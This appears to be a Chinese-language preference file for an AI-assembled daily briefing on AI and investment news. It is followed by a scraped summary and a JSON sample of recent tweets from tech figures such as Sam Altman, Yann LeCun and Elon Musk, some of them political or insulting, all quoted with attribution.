王川(硅谷) | 高 | 科技投资观察、深度思考 | 原@王川(已修正英文handle为@svwang1);质量高 | +| @liuliu | 刘进 | 中 | VC投资、华语科技圈 | 英文handle,Nitter可用 | + +--- + +## 三、内容类型偏好 + +### ✅ 优先展示 +- **可操作的项目/工具**:有 GitHub 链接、可以立刻尝试的内容 +- **AI 编程实践**:提示词技巧、Agent 搭建、工作流分享 +- **行业方向判断**:顶级 VC 或创始人对未来的预测和押注 +- **宏观与投资叙事**:A股、美股科技板块的结构性变化 +- **中文圈独特视角**:英文圈没有的本地化洞见 + +### ❌ 降低优先级 +- 纯政治观点(和 AI/投资无关的) +- 加密货币炒作、价格预测类 +- 互相转发的无实质内容互动 +- 重复已知信息的科普 + +--- + +## 四、简报格式偏好 + +``` +📰 AI & 投资日报 · [日期] + +【30秒总览】一句话概括今日主旋律 + +━━━━━━━━━━━━━ +🔥 今日主题卡片(2~3个) +每张卡片包含: + - 主题标签 + - 核心洞见(1~2句) + - 来源账号 + - 你可以做什么(可操作建议) + +━━━━━━━━━━━━━ +⚡ 快速扫读(剩余有价值内容) + +━━━━━━━━━━━━━ +🀄 华语圈单独板块 + +━━━━━━━━━━━━━ +📌 本期可以跟着做的事 + +━━━━━━━━━━━━━ +😴 今日无新内容的账号 +``` + +**语言**:中文总结为主,保留有分量的英文原句 +**长度**:10分钟内可以读完 +**主题卡片数量**:每日 2~3 个,宁缺毋滥 + +--- + +## 五、行为日志 +> 由 Claude 根据你的互动自动追加。记录有意义的偏好信号,作为未来权重调整的依据。 + +| 日期 | 行为 | 内容摘要 | 影响 | +|------|------|----------|------| +| 2026-04-26 | 初始配置建立 | 人工设定初始权重 | — | +| 2026-04-28 | 账号列表核查优化 | Web搜索核查全部33个账号的真实性与活跃度 | 见变更日志 | + +--- + +## 六、待解决的遗留问题 +> 系统尚未实现的功能,记录在此,后续迭代时参考。 + +- [ ] 账号内容类型自动分类(通用知识型 vs 项目介绍型),不同类型反馈权重不同 +- [ ] 点踩行为如何自动写回本文件并影响下次抓取权重 +- [ ] 新账号发现与加入机制(何时、如何引入新的关注对象) +- [ ] 账号沉默超过 N 天自动降权的规则实现 + +上下文(摘要): +# X平台关注列表推文汇总 + +**生成日期**: 2026-04-27T17:07:38.921884+00:00 +**数据来源**: Nitter RSS 订阅 +**时间范围**: 最近7天 +**账号总数**: 27 | **成功获取**: 21 | **推文总数**: 259 + +--- + +### ✅ @karpathy — Andrej Karpathy(1 条) + +**[2026-04-22T16:00:05+00:00]** +> RT by @karpathy: Imagine every pixel on your screen, streamed live directly from a model. No HTML, no layout engine, no code. Just exactly what you want to see. @eddiejiao_obj, @drewocarr and I built… +[原文链接](https://x.com/karpathy/status/2046982383430496444) + +--- + +### ✅ @sama — Sam Altman(20 条) + +**[2026-04-27T13:24:26+00:00]** +> we have updated our partnership with microsoft. microsoft will remain our primary cloud partner, but we are now able to make our products and services available across all clouds. will continue to pr… +[原文链接](https://x.com/sama/status/2048755148361707946) + +**[2026-04-27T13:09:30+00:00]** +> this is so good: https://paulgraham.com/kids.html +[原文链接](https://x.com/sama/status/2048751392031203544) + +**[2026-04-27T00:05:31+00:00]** +> so fun to see the reception to 5.5! there is almost nothing that feels more gratifying to me than builders saying they find our tools useful. +[原文链接](https://x.com/sama/status/2048554097985593849) + +**[2026-04-26T23:59:53+00:00]** +> Our Principles: Democratization, Empowerment, Universal Prosperity, Resilience, and Adaptability https://openai.com/index/our-principles/ +[原文链接](https://x.com/sama/status/2048552677433643427) + +**[2026-04-26T15:46:41+00:00]** +> feels like a good time to seriously rethink how operating systems and user interfaces are designed (also the internet; there should be a protocol that is equally usable by people and agents) +[原文链接](https://x.com/sama/status/2048428561481265539) + +**[2026-04-26T15:37:00+00:00]** +> "post-AGI, no one is going to work and the economy is going to collapse" "i am switching to polyphasic sleep because GPT-5.5 in codex is so good that i can't afford to be sleeping for such long stret… +[原文链接](https://x.com/sama/status/2048426122854228141) + +**[2026-04-26T02:15:19+00:00]** +> RT by @sama: That's exactly my view too, roughly compresses 2 weeks of our previous jobs to 1 day +[原文链接](https://x.com/sama/status/2048224374264885396) + +**[2026-04-25T22:20:08+00:00]** +> how can they write code so fast?! +[原文链接](https://x.com/sama/status/2048165186482389253) + +**[2026-04-25T22:01:18+00:00]** +> R to @sama: (and we will fix the former) +[原文链接](https://x.com/sama/status/2048160448340767038) + +**[2026-04-25T22:01:08+00:00]** +> we still get looksmaxxed on frontend a little but we IQmog hard now +[原文链接](https://x.com/sama/status/2048160404376105179) + +**[2026-04-25T15:31:08+00:00]** +> 5.5 is so earnest "little engine that could" energy +[原文链接](https://x.com/sama/status/2048062261584077149) + +**[2026-04-24T23:41:49+00:00]** +> this was a good week. proud of the team. happy building! +[原文链接](https://x.com/sama/status/2047823357635354814) + +**[2026-04-24T21:17:51+00:00]** +> GPT-5.5 and GPT-5.5 Pro are now available in the API! +[原文链接](https://x.com/sama/status/2047787124846653895) + +**[2026-04-24T14:27:13+00:00]** +> 🫶 +[原文链接](https://x.com/sama/status/2047683787828703289) + +**[2026-04-24T00:33:16+00:00]** +> RT by @sama: Today we open sourced many of OpenAI's monitorability evaluations. We hope that the research community and other model developers can build upon them and use them to evaluate the monitor… +[原文链接](https://x.com/sama/status/2047473914528563592) + +**[2026-04-23T19:54:32+00:00]** +> "don't retweet this, don't retweet this, don't retweet this..." ah fuck it, life imitates art. +[原文链接](https://x.com/sama/status/2047403771416940715) + +**[2026-04-23T19:21:55+00:00]** +> We tried a new thing with NVIDIA to roll out Codex across a whole company and it was awesome to see it work. Let us know if you'd like to do it at your company! +[原文链接](https://x.com/sama/status/2047395562501411058) + +**[2026-04-23T19:09:11+00:00]** +> embers +[原文链接](https://x.com/sama/status/2047392357482639749) + +**[2026-04-23T18:47:43+00:00]** +> RT by @sama: there are early signs of 5.5 being a competent ai research partner. several researchers let 5.5 run variations of experiments overnight given only a high level algorithmic idea, wake up … +[原文链接](https://x.com/sama/status/2047386955550470245) + +**[2026-04-23T18:26:18+00:00]** +> RT by @sama: New in the Codex app: - GPT-5.5 - Browser control - Sheets & Slides - Docs & PDFs - OS-wide dictation - Auto-review mode Enjoy! +[原文链接](https://x.com/sama/status/2047381565534322694) + +--- + +### ✅ @DarioAmodei — Dario Amodei(0 条) + +--- + +### ✅ @AravSrinivas — Aravind Srinivas(10 条) + +**[2026-04-24T21:24:24+00:00]** +> You would consume less computer credits (and be able to run more tasks as a result) if you switched to GPT-5.5 as your default orchestrator. This was the number one complaint about Computer (being cr… +[原文链接](https://x.com/AravSrinivas/status/2047788775468908840) + +**[2026-04-24T19:03:21+00:00]** +> We’re rolling out GPT 5.5 as the default orchestrator model for Perplexity Computer. We will be monitoring the user sentiment compared to Opus 4.7 as the default as the rollout expands. Let us know y… +[原文链接](https://x.com/AravSrinivas/status/2047753276888854595) + +**[2026-04-24T18:44:19+00:00]** +> RT by @AravSrinivas: GPT-5.5 is now available on Perplexity for Max subscribers. GPT-5.5 is also rolling out as the default orchestration model in Computer for both Pro and Max subscribers. +[原文链接](https://x.com/AravSrinivas/status/2047748486767272243) + +**[2026-04-23T02:46:57+00:00]** +> RT by @AravSrinivas: Kimi K2.6, the new state-of-the-art open-weight model from Moonshot, is now available for Pro and Max subscribers. +[原文链接](https://x.com/AravSrinivas/status/2047145172337836139) + +**[2026-04-22T18:28:20+00:00]** +> We’ve post trained a model on top of Qwen that achieves Pareto optimality on accuracy-cost curves. Unlike our previous post trained models, this model has been trained to be good at search and tool c… +[原文链接](https://x.com/AravSrinivas/status/2047019688920756504) + +**[2026-04-22T18:15:16+00:00]** +> RT by @AravSrinivas: We've published new research on how we post-train models for accurate search-augmented answers. Our SFT + RL pipeline improves search, citation quality, instruction following, an… +[原文链接](https://x.com/AravSrinivas/status/2047016400292839808) + +**[2026-04-21T17:14:42+00:00]** +> As agentic workloads expand, the best orchestration hybridizes centralized servers and CPUs for the ultimate continuity. Especially when you want your AI to use your local apps and messages. +[原文链接](https://x.com/AravSrinivas/status/2046638770162995603) + +**[2026-04-21T15:06:26+00:00]** +> ⌘ ⌘ +[原文链接](https://x.com/AravSrinivas/status/2046606492649091212) + +**[2026-04-21T02:43:37+00:00]** +> RT by @AravSrinivas: Whoa 🤯 +[原文链接](https://x.com/AravSrinivas/status/2046419556424675677) + +**[2026-04-20T21:57:10+00:00]** +>  +[原文链接](https://x.com/AravSrinivas/status/2046347469488107839) + +--- + +### ✅ @AndrewYNg — Andrew Ng(1 条) + +**[2026-04-27T15:58:13+00:00]** +> AI-native software engineering teams operate very differently than traditional teams. The obvious difference is that AI-native teams use coding agents to build products much faster, but this leads to… +[原文链接](https://x.com/AndrewYNg/status/2048793852702757151) + +--- + +### ✅ @ylecun — Yann LeCun(19 条) + +**[2026-04-26T18:31:11+00:00]** +> RT by @ylecun: Republicans have been making this argument my entire life. We had 8 years of Clinton, 8 years of Obama, 4 years of Biden— never became a socialism. But you know what we got? More jobs,… +[原文链接](https://x.com/ylecun/status/2048469956627468510) + +**[2026-04-26T17:27:23+00:00]** +> RT by @ylecun: Trump just fired all 24 members of the National Science Board. Every single one. By email. No warning. No reason given. The board has existed since 1950. The National Science Board is … +[原文链接](https://x.com/ylecun/status/2048453901930660058) + +**[2026-04-26T16:03:04+00:00]** +> RT by @ylecun: Existential risk mongers are a small, very vocal cult with a lot of very clever online astroturfing skills. Politicians never waste a good fake crisis, which is why they're perfect for… +[原文链接](https://x.com/ylecun/status/2048432684930654430) + +**[2026-04-26T13:51:41+00:00]** +> Shooting oneself in the foot? Nope. Shooting oneself in the prefrontal cortex. +[原文链接](https://x.com/ylecun/status/2048399621492236615) + +**[2026-04-26T06:48:29+00:00]** +> RT by @ylecun: Never let critical thinking get in the way of extremist fantasy stories. If you're on either side of this slider, congratulations, you may be a child in an adult costume body! Black an… +[原文链接](https://x.com/ylecun/status/2048293118781296734) + +**[2026-04-25T19:15:22+00:00]** +> RT by @ylecun: OPINION: "Trump’s mismanagement has resulted in death, destruction, wasted tax dollars, and a huge loss in respect for the United States — all to accomplish nothing." https://ebx.sh/V5… +[原文链接](https://x.com/ylecun/status/2048118689258487857) + +**[2026-04-25T16:01:07+00:00]** +> RT by @ylecun: When MTV News shut down, it felt like decades of culture vanished overnight 🕳️ But over 470,000 pages were already preserved. That history didn’t disappear. It was archived. 📚 Read VAN… +[原文链接](https://x.com/ylecun/status/2048069805807128734) + +**[2026-04-24T20:50:37+00:00]** +> RT by @ylecun: Number of people who go bankrupt every year because of medical bills or illness-related work loss: 🇦🇺 0 🇨🇦 0 🇩🇰 0 🇫🇮 0 🇫🇷 0 🇩🇪 0 🇮🇸 0 🇮🇪 0 🇮🇹 0 🇯🇵 0 🇳🇱 0 🇳🇴 0 🇵🇹 0 🇪🇸 0 🇸🇪 0 🇬🇧 0 🇺🇸 53… +[原文链接](https://x.com/ylecun/status/2047780272297382384) + +**[2026-04-24T19:31:52+00:00]** +> RT by @ylecun: New episode of The Information Bottleneck is out, this time with @liuzhuang1234 (Princeton). We talked about ConvNeXt and whether architecture still matters; dataset bias and what "goo… +[原文链接](https://x.com/ylecun/status/2047760455679246500) + +**[2026-04-24T17:45:08+00:00]** +> RT by @ylecun: The web is disappearing 🕳️ According to a Pew Research Center report, 26% of pages from 2013-2023 are no longer accessible. But that’s not the whole story. In a new study published in … +[原文链接](https://x.com/ylecun/status/2047733594064408894) + +**[2026-04-24T15:23:18+00:00]** +> RT by @ylecun: 图灵奖获得者、 AI 三大教父之一的 LeCun在达沃斯的发言,算是把整个硅谷的遮羞布扯了。 他说现在整个行业都被LLM彻底洗脑了,所有人都在同一条赛道上互相挖人,谁敢偏离主流谁就被骂落后。 这也是他离开Meta的真正原因,连Meta都已经LLM-pilled,他不想再跟风了。 最扎心的一句话是:纯生成式架构,不管是LLM、VLM还是VLA,永远造不出哪怕猫级的智能… +[原文链接](https://x.com/ylecun/status/2047697898989572176) + +**[2026-04-24T14:14:06+00:00]** +> RT by @ylecun: A mathematician who shared an office with Claude Shannon at Bell Labs gave one lecture in 1986 that explains why some people win Nobel Prizes and other equally smart people spend their… +[原文链接](https://x.com/ylecun/status/2047680485208531152) + +**[2026-04-24T13:58:49+00:00]** +> RT by @ylecun: Feel like very few serious people make the argument Britain should develop its own LLM? Certainly not an argument you see made in Westminster often during the sovereignty debate. Also … +[原文链接](https://x.com/ylecun/status/2047676640059154653) + +**[2026-04-24T11:19:36+00:00]** +> RT by @ylecun: 1. I never said LLMs were not useful. They are, particularly with all the bells and whistles that are being added to them. I use them. 2. A robot-rich future can't be built with AIs th… +[原文链接](https://x.com/ylecun/status/2047636569767419951) + +**[2026-04-24T10:30:09+00:00]** +> RT by @ylecun: 🎓 Register now for ML & Advanced Stats Summer School, an intensive set of courses on theoretical foundations & applications of ML methods & modern stats analysis techniques. With @ELLI… +[原文链接](https://x.com/ylecun/status/2047624126047670758) + +**[2026-04-24T06:38:08+00:00]** +> RT by @ylecun: 🔴 Trump vient de publier sur Truth Social un monologue de 1 500 mots sur le droit du sol, l'ACLU, les Indiens, les Chinois et la "Savage Nation". Ce texte inhabituellement long, inhabi… +[原文链接](https://x.com/ylecun/status/2047565736382534091) + +**[2026-04-23T23:15:06+00:00]** +> RT by @ylecun: Trump completely passed out, reawakened, then passed out again during today's pressor in the Oval Office. 😂🤣👇 +[原文链接](https://x.com/ylecun/status/2047454244781818205) + +**[202 + +推文样本(JSON): +[{"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-27T16:54:21+00:00", "title": "Calling him “Scam” Altman is accurate. \n\nThis is very much worth reading.", "url": "https://x.com/elonmusk/status/2048807976991850953"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-27T16:39:59+00:00", "title": "RT by @elonmusk: Sam Altman cannot be trusted.\n\n• The OpenAI board fired him because he was not always honest with them. They said he should not control powerful AI.\n\n• A major report talked to over 100 people and saw secret papers. It says he has almost a sociopathic lack of con", "url": "https://x.com/elonmusk/status/2048804363595059425"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-27T16:31:33+00:00", "title": "Exactly", "url": "https://x.com/elonmusk/status/2048802239272169582"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-27T16:30:27+00:00", "title": "Pinned: Scam Altman and Greg Stockman stole a charity. Full stop. \n\nGreg got tens of billions of stock for himself and Scam got dozens of OpenAI side deals with a piece of the action for himself, Y Combinator style. After this lawsuit, Scam will also be awarded tens of billions i", "url": "https://x.com/elonmusk/status/2048801964457140540"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-27T16:21:30+00:00", "title": "Scam Altman", "url": "https://x.com/elonmusk/status/2048799712375902624"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-27T16:21:01+00:00", "title": "Americans spent over $109 billion on lottery tickets last year, which is more than they spent on movies, books, concerts and sports tickets - combined.", "url": "https://x.com/charliebilello/status/2048799590044852390"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-27T16:13:00+00:00", "title": "Imagine when you can take these on Uber (or own one), what it will do to real estate values?!? 🤯 \n\nFrom hill country ranches to Austin in ten minutes?! \n\nIf you could buy one for $2m, or lease for $5k a month, and commute into a city from the burbs?!? Wild. https://x.com/shaig/st", "url": "https://x.com/jason/status/2048797572014207114"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-27T16:10:40+00:00", "title": "10 minutes from manhattan to jfk is a game changer… \n\n… but the 5 minutes from my loft in Chelsea to Breezy Point in 7 minutes during the 90s would have been insane! \n\nImagine when you can take these on Uber (or own one), what it will do to real estate values?!? 🤯 https://x.com/", "url": "https://x.com/jason/status/2048796982227972344"}, {"handle": "AndrewYNg", "name": "Andrew Ng", "published_at": "2026-04-27T15:58:13+00:00", "title": "AI-native software engineering teams operate very differently than traditional teams. The obvious difference is that AI-native teams use coding agents to build products much faster, but this leads to many other changes in how we operate. For example, some great engineers now play", "url": "https://x.com/AndrewYNg/status/2048793852702757151"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-27T15:56:52+00:00", "title": "RT by @elonmusk: From space to your phone, Starlink Mobile is now available to deliver data, voice, video, and messaging to @docomo customers in Japan 🛰️❤️📱", "url": "https://x.com/elonmusk/status/2048793511701717143"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-27T15:56:20+00:00", "title": "RT by @Jason: update! the @twistartups AI sidebar is going well\n\nThe goal: a live AI sidebar with 4 personas watching the pod in real time\n\nProgress update: \n✅ Side bar (Chrome extension works with any website)\n✅ Two characters: comedian fox + troll alien\n✅ Ability to adjust freq", "url": "https://x.com/jason/status/2048793378511536538"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T15:50:31+00:00", "title": "If a major car company had AI fan boys and released a car with loose lug nuts and the wheels came off, after hyping it as the greatest thing ever, and a bunch of people died, those fan boys would say “y’all shoulda known”.", "url": "https://x.com/GaryMarcus/status/2048791912149295182"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T15:33:34+00:00", "title": "R to @GaryMarcus: that said, another tweet by the same user does correctly assess what’s wrong with most user’s model of what LLMs say.", "url": "https://x.com/GaryMarcus/status/2048787646206677207"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T15:31:37+00:00", "title": "This is totally wrong.\n\nBlaming the user is missing the point that (a) coding agents have been overhyped and (b) can’t reliably obey the rules given to them in system prompts and other guardrails.", "url": "https://x.com/GaryMarcus/status/2048787157536653627"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-27T15:26:33+00:00", "title": "RT by @elonmusk: .@shaunmmaguire says Elon Musk’s X acquisition was in service of civilizational-scale missions.\n\n\"I truly believe, like in my soul, that he is trying to help humanity.\"\n\n\"He has these goals. Like back up the biosphere by making us a multi-planetary species or ush", "url": "https://x.com/elonmusk/status/2048785882950549854"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-27T15:15:09+00:00", "title": "If extremely violent criminals are not imprisoned, eventually they will murder innocent people", "url": "https://x.com/elonmusk/status/2048783014075777369"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-27T15:03:32+00:00", "title": "Best accounts for following Austin air quality? @grok", "url": "https://x.com/jason/status/2048780089295302690"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-27T14:53:45+00:00", "title": "Excellent point", "url": "https://x.com/elonmusk/status/2048777628019032335"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T14:27:36+00:00", "title": "yep, that’s what I do. \n\nI am increasingly concerned that people in China are soaking up my wisdom, while a lot of people in the US try to dismiss me.\n\ni don’t think that is going to end well.", "url": "https://x.com/GaryMarcus/status/2048771044987777428"}, {"handle": "HarryStebbings", "name": "Harry Stebbings", "published_at": "2026-04-27T14:02:33+00:00", "title": "R to @HarryStebbings: Spotify https://open.spotify.com/episode/5KPihKzCMKY2DnPeuSxXZ5\nApple Podcasts https://podcasts.apple.com/us/podcast/20vc-applovin-%24160bn-market-cap-%245-48bn-revenue-%2410m/id958230465?i=1000763769440\nYoutube https://youtu.be/dlPCz8Jwypw", "url": "https://x.com/HarryStebbings/status/2048764743205134644"}, {"handle": "HarryStebbings", "name": "Harry Stebbings", "published_at": "2026-04-27T14:02:33+00:00", "title": "Adam Foroughi is by far one of the best CEOs I have ever interviewed.\n\nCandidly he is insanely stern and cold but also obsessive, focused and utterly brilliant.\n\nWith Adam there is zero fluff, like none. He says what he means and means what he says.\n\nApplovin does $10M EBITDA per", "url": "https://x.com/HarryStebbings/status/2048764741435179442"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-27T13:50:42+00:00", "title": "2026 is following the same playbook as 2025. Only difference is traders have become much more immune to extreme rhetoric and have been more confident in buying the dip, sending the stock market quickly back to new all-time highs. $SPX\n\nVideo: https://www.youtube.com/watch?v=p5e0T", "url": "https://x.com/charliebilello/status/2048761760971096534"}, {"handle": "JeffDean", "name": "Jeff Dean", "published_at": "2026-04-27T13:40:08+00:00", "title": "The video of my conversation with Amin Vahdat, @gilbert, and @djrosent at Cloud Next last week is now up. \n\nhttps://youtu.be/BpnJYJmbXcM?si=vUY3hI_aDX8K6gco\n\nThanks for a great conversation!", "url": "https://x.com/JeffDean/status/2048759102390899142"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T13:32:43+00:00", "title": "⚠️ AI agents are wildly premature technology that is being rolled out way too fast. The deepest lesson about the vibe coded AI agent disaster story that is running around is NOT about losing your data. ⚠️\n\n𝗜𝘁’𝘀 𝗮𝗯𝗼𝘂𝘁 𝗔𝗜 𝘀𝗮𝗳𝗲𝘁𝘆. \n\nThe user wasn’t (totally) naive. He thought system", "url": "https://x.com/GaryMarcus/status/2048757233174122827"}, {"handle": "HarryStebbings", "name": "Harry Stebbings", "published_at": "2026-04-27T13:30:16+00:00", "title": "Two areas I would love to invest that are non-technical: \n\n1. Egg freezing clinics. In 10 years, strongly believe every 21 year old will freeze their eggs and it becomes the norm. \n\nAmazing business. Insane retention numbers. Super high margin. \n\n2. AI re-skilling facilities. Go ", "url": "https://x.com/HarryStebbings/status/2048756619622707452"}, {"handle": "soumithchintala", "name": "Soumith Chintala", "published_at": "2026-04-27T13:29:14+00:00", "title": "This is kinda interesting.\n\nAnthro probably needs to scale up Account Support via Claude or via humans (traditional account managers). Would be funny if they chose humans.\n\nAlternatively, more and more companies can probably go multi-AI with open harnesses. \n\nSimilar problems to ", "url": "https://x.com/soumithchintala/status/2048756358820827564"}, {"handle": "sama", "name": "Sam Altman", "published_at": "2026-04-27T13:24:26+00:00", "title": "we have updated our partnership with microsoft.\n\nmicrosoft will remain our primary cloud partner, but we are now able to make our products and services available across all clouds.\n\nwill continue to provide them with models and products until 2032, and a revenue share through 203", "url": "https://x.com/sama/status/2048755148361707946"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-27T13:16:36+00:00", "title": "The S&P 500's CAPE Ratio has moved up to 41, its highest level since 2000 and now above 99% of historical valuations. $SPX\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=36s", "url": "https://x.com/charliebilello/status/2048753179471323584"}, {"handle": "sama", "name": "Sam Altman", "published_at": "2026-04-27T13:09:30+00:00", "title": "this is so good:\n\nhttps://paulgraham.com/kids.html", "url": "https://x.com/sama/status/2048751392031203544"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-27T13:08:19+00:00", "title": "With 28% of companies reported, S&P 500 1st quarter earnings are up 15% over the prior year, the 13th consecutive quarter of positive YoY growth. $SPX\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=973s", "url": "https://x.com/charliebilello/status/2048751094671585397"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-27T12:53:00+00:00", "title": "RT by @charliebilello: Wondering which month is the best time to start investing?\nThe right answer is any month. Just start!", "url": "https://x.com/charliebilello/status/2048747238986305979"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-27T12:50:55+00:00", "title": "RT by @elonmusk: Today marks the start of the Elon Musk v.Sam Altman trial.\n\nTwo opposing worldviews. \nSam Altman transformed a non-profit organization into one of the world's most profitable companies for his own enrichment.\n\n Elon Musk, who did everything he could to limit the", "url": "https://x.com/elonmusk/status/2048746715805581608"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T12:48:41+00:00", "title": "R to @GaryMarcus: Stop blaming the users. It’s not that simple:", "url": "https://x.com/GaryMarcus/status/2048746152749846549"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-27T12:40:59+00:00", "title": "RT by @elonmusk: 🚨 NEWS: Emirates upgrades its iconic A380 with Starlink high-speed Wi-Fi, delivering “better-than-home” internet at 40,000 feet.\n\n• Up to 3 Starlink antennas on each A380 for massive speed boost\n\n• Internet performance improved up to 1000x vs older systems\n\n• Ena", "url": "https://x.com/elonmusk/status/2048744214230712500"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T12:36:05+00:00", "title": "People keep blaming the users for the growing number of vibe-coded reasoners. Doing so is *half* right.\n\nUsers *are*screwing up - by letting vibe coded stuff access their files, without proper backups, without proper monitoring, without adequate sysadmin, etc.\n\nBut that’s *exactl", "url": "https://x.com/GaryMarcus/status/2048742983684784239"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T12:20:17+00:00", "title": "“Vibe coded disasters piling up on Reddit”", "url": "https://x.com/GaryMarcus/status/2048739005525877072"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-27T11:35:33+00:00", "title": "RT by @elonmusk: This is the 7th consecutive week with new reporting that ChatGPT was used in connection with murder or suicide. \n\nOpenAI doesn’t “benefit all of humanity.”", "url": "https://x.com/elonmusk/status/2048727747954868342"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-27T11:08:22+00:00", "title": "RT by @elonmusk: They arrested the President of the United States of America 4X, charged him 91X, indicted him 4X, spied on his campaign, sabotaged his first term, jailed his supporters, raided his private residence, censored him, gagged him, tried to bankrupt him, and attempted ", "url": "https://x.com/elonmusk/status/2048720909809156378"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-04-27T10:01:28+00:00", "title": "One of my favorite pictures. A guy I didn't know took it of us on a street in Palo Alto about 10 years ago.", "url": "https://x.com/paulg/status/2048704073356935676"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-04-27T09:50:40+00:00", "title": "You never need to describe something as a \"bad take.\" If it's false or irrelevant or omits something important, you can just say so. And if it's true, relevant, and complete, it's not a bad take.", "url": "https://x.com/paulg/status/2048701354672050286"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-04-27T08:17:48+00:00", "title": "Worrying that your startup will be eaten by the model companies is like worrying that your life will be constrained after you become a movie star. You're far more likely simply to fail.", "url": "https://x.com/paulg/status/2048677984106664227"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-27T08:14:21+00:00", "title": "😳", "url": "https://x.com/pmarca/status/2048677114480873657"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-27T08:07:29+00:00", "title": "cc @BrendanEich", "url": "https://x.com/pmarca/status/2048675385119019444"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-27T08:04:13+00:00", "title": "👀", "url": "https://x.com/pmarca/status/2048674564314685477"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-27T08:01:44+00:00", "title": "But \"A Disservice To Those Who Are Watching\" is the name of this show!", "url": "https://x.com/pmarca/status/2048673940072251670"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-27T07:59:56+00:00", "title": "cc @elonmusk", "url": "https://x.com/pmarca/status/2048673488383447437"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-27T04:43:41+00:00", "title": "When one thing becomes abundant and cheap, another thing becomes scarce and valuable.", "url": "https://x.com/pmarca/status/2048624098398650608"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-27T04:32:43+00:00", "title": "Overheard in Silicon Valley: \"Imagine if he heard how the world really worked. Wonder what manifesto would say then.\"", "url": "https://x.com/pmarca/status/2048621340408844368"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-27T04:29:26+00:00", "title": "Image", "url": "https://x.com/pmarca/status/2048620511912194339"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-27T04:10:44+00:00", "title": "The apps can rewrite the files. 👀", "url": "https://x.com/pmarca/status/2048615807190769738"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-04-27T04:08:42+00:00", "title": "RT by @paulg: Whenever I go to Paris to talk about investing in YC startups, I'm always amazed how much the French just LOVE Y Combinator. Nous t'aimons aussi, France.\n\nMy French friend of @Fundoraclub wanted to see YC from the inside...and share it with the people of France. T", "url": "https://x.com/paulg/status/2048615296613937201"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-27T04:07:00+00:00", "title": "Many such cases.", "url": "https://x.com/pmarca/status/2048614869352714619"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-27T04:06:10+00:00", "title": "🇺🇸", "url": "https://x.com/pmarca/status/2048614659595583651"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-27T04:04:46+00:00", "title": "Many such cases (in the universe).", "url": "https://x.com/pmarca/status/2048614305705386433"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-27T03:56:11+00:00", "title": "Concerning.", "url": "https://x.com/pmarca/status/2048612144871264609"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-27T03:49:14+00:00", "title": "Self recommending!", "url": "https://x.com/pmarca/status/2048610397243265189"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T03:39:49+00:00", "title": "RT by @GaryMarcus: The greatest con of the decade was calling autocomplete “AI”. \n\nThe second greatest is calling autocomplete-in-a-loop an “agent”.", "url": "https://x.com/GaryMarcus/status/2048608025464705084"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-27T03:11:45+00:00", "title": "Grok Imagine", "url": "https://x.com/elonmusk/status/2048600964102246438"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-27T03:01:18+00:00", "title": "Self recommending recommending.", "url": "https://x.com/pmarca/status/2048598334492033455"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-27T02:57:11+00:00", "title": "👀", "url": "https://x.com/pmarca/status/2048597298150875169"}, 